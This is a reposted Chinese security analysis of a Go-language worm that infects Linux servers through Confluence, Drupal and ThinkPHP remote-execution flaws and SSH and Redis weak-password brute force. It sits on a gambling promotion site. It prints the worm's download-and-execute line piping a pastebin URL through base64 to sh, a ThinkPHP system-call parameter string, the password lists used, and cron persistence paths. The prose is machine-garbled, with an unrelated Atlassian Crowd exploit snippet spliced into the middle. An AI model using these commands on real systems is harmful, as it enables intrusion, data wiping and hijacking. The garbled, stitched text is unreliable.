Golang蠕虫众多?让我们揪出其始作俑者 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

Golang蠕虫众多?让我们揪出其始作俑者

申博_安全防护 申博 75次浏览 未收录 0个评论

概述 

近日,外洋平安网站SECURITYWEEK表露,一款Go言语歹意软件正大批感染Linux服务器,其运用了多达6种流传感染体式格局,包括4个长途实行破绽(ThinkPHP、THinkPHP2、Dural、Confluence),2个弱暗码爆破进击(SSH、Redis)。深佩服平安团队对该蠕虫举行了追踪。

Golang蠕虫众多?让我们揪出其始作俑者

目前为止,歹意软件较少会运用Go言语编写,这是因为依靠库的缘由,编译出来的顺序较为冗余,以下经由过程VT能够得知,该样本有近9M那么大。但是,运用Go言语也有一个优点,就是易于集成第三方的库。

Golang蠕虫众多?让我们揪出其始作俑者

逆向剖析

对该样本举行反汇编,能够清楚地看到破绽进击对应的函数,个中Attack函数是主函数,顺次挪用getip和checkPort,来搜刮同网段在线的主机IP,以及其开放端口,若发明有22、6379端口开放,则对其举行弱暗码爆破;若发明有80端口,则对其举行破绽扫描及进击。

Golang蠕虫众多?让我们揪出其始作俑者

1、CVE_2019_3396

CVE_2019_3396是Confluence的破绽,进击exp以下,将payload存储于_template参数中。

Golang蠕虫众多?让我们揪出其始作俑者

2、Drupal

Drupal的进击exp以下,对应的CVE编号为CVE-2018-7600。

Golang蠕虫众多?让我们揪出其始作俑者

3、ThinkPHP

ThinkPHP有两个破绽应用,下面这个是CVE-2019-9082破绽,运用function=call_user_func_array&vars[0]=system&vars[1][]=URL应用该破绽实行命令。

Golang蠕虫众多?让我们揪出其始作俑者

4、ThinkPHP2

另一个破绽应用跟上面的类似,进击exp以下。

Golang蠕虫众多?让我们揪出其始作俑者

励志鸡汤:新手视角分析Atlassian Crowd RCE – CVE-2019-11580

简介 Atlassian Crowd是Atlassian旗下的主要产品之一,Crowd是一个单点登录和用户身份管理工具,容易使用、管理方便并且可集成自己的插件进行扩展,另外在Crowd平台上能够管理全部应用程序的访问权限 – Atlassian、Subversion、Google应用、或者自己开发的应用程序。 从获取到的信息中得知,攻击目标使用的是Crowd较早的版本。通过Google检索相关信息看是否存在相关漏洞,从官方修复报告中发现,之前存在着pdkinstall开发插件错误启用导致远程代码执行的漏洞(CVE-2019-11580)  根据这一信息再进行搜索,没

5、Redis爆破

Redis上岸不需要用户名,爆破会运用以下几个弱暗码:admin、redis、root、123456、password、user、test。上岸胜利后,蠕虫会先挪用FlushAll删除一切数据库,然后建立一个root数据库来寄存歹意代码,该代码一样会被建立到/var/spool/cron和/etc/cron.d中以完成耐久化隐蔽。

Golang蠕虫众多?让我们揪出其始作俑者

插进去的是下面这个歹意代码,这个代码的意义是,每隔一分钟,就解密实行一次https://pastebin.com/raw/xvfxprtb的代码。

Golang蠕虫众多?让我们揪出其始作俑者

6、SSH爆破

SSH爆破运用的用户名为:root、admins、user、test,暗码离别为:admins、root、test、user、123456、password。

从上面几个破绽进击和暗码爆破的体式格局来看,进击末了的目标都是为了实行命令:’curl -fsSLhttps://pastebin.com/raw/xvfxprtb) | base64 -d) | sh’,所以,这个url的代码应当就是进击的中心代码。pastebin.com/raw/xvfxprtb的代码以下,是经由base64加密的。

Golang蠕虫众多?让我们揪出其始作俑者

解密后能够瞥见其主要操纵,将m.jianlistore.com/images/qrcode/1414297564.jpg保存为当地的/tmp/.mysqli/mysqlc并实行,这个文件之前已经有文章剖析过了,不再累坠:https://www.freebuf.com/articles/terminal/206170.html。

Golang蠕虫众多?让我们揪出其始作俑者

事宜追踪

回到方才的网址:pastebin.com/raw/xvfxprtb,对其举行追踪,将网址中的raw去掉,就能够看到该代码的发布者了,从下图中能够得知,该作者为NIDAYE222(你大爷?),代码是6月10号上传的,访问量迄今为止为18000+,申明该蠕虫的感染量也许也是这个数,感染数目也还在极速上升。

Golang蠕虫众多?让我们揪出其始作俑者

运用搜刮引擎搜刮nidaye222,能够发明,发布者在14天刚建立了个github账户,而在6月26号和30离别fork了破绽扫描器kunpeng和开源挖矿xmrig,看来这个蠕虫的作者很有多是从这得到了启示。

Golang蠕虫众多?让我们揪出其始作俑者

Kunpeng是一个开源的POC检测框架,也是运用go言语举行编写的,所以,不消除作者有复用个中破绽应用代码的可能性。

Golang蠕虫众多?让我们揪出其始作俑者

Kunpeng目前为止收录了85个破绽POC,个中也包括了该蠕虫所应用的破绽,可想而知,只需作者情愿,他能够继承扩大以下破绽进击代码到蠕虫中去,所以,人人只管打上响应的破绽补丁,防备感染该病毒。

Golang蠕虫众多?让我们揪出其始作俑者

原文地点: https://www.4hou.com/system/19309.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Golang蠕虫众多?让我们揪出其始作俑者
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址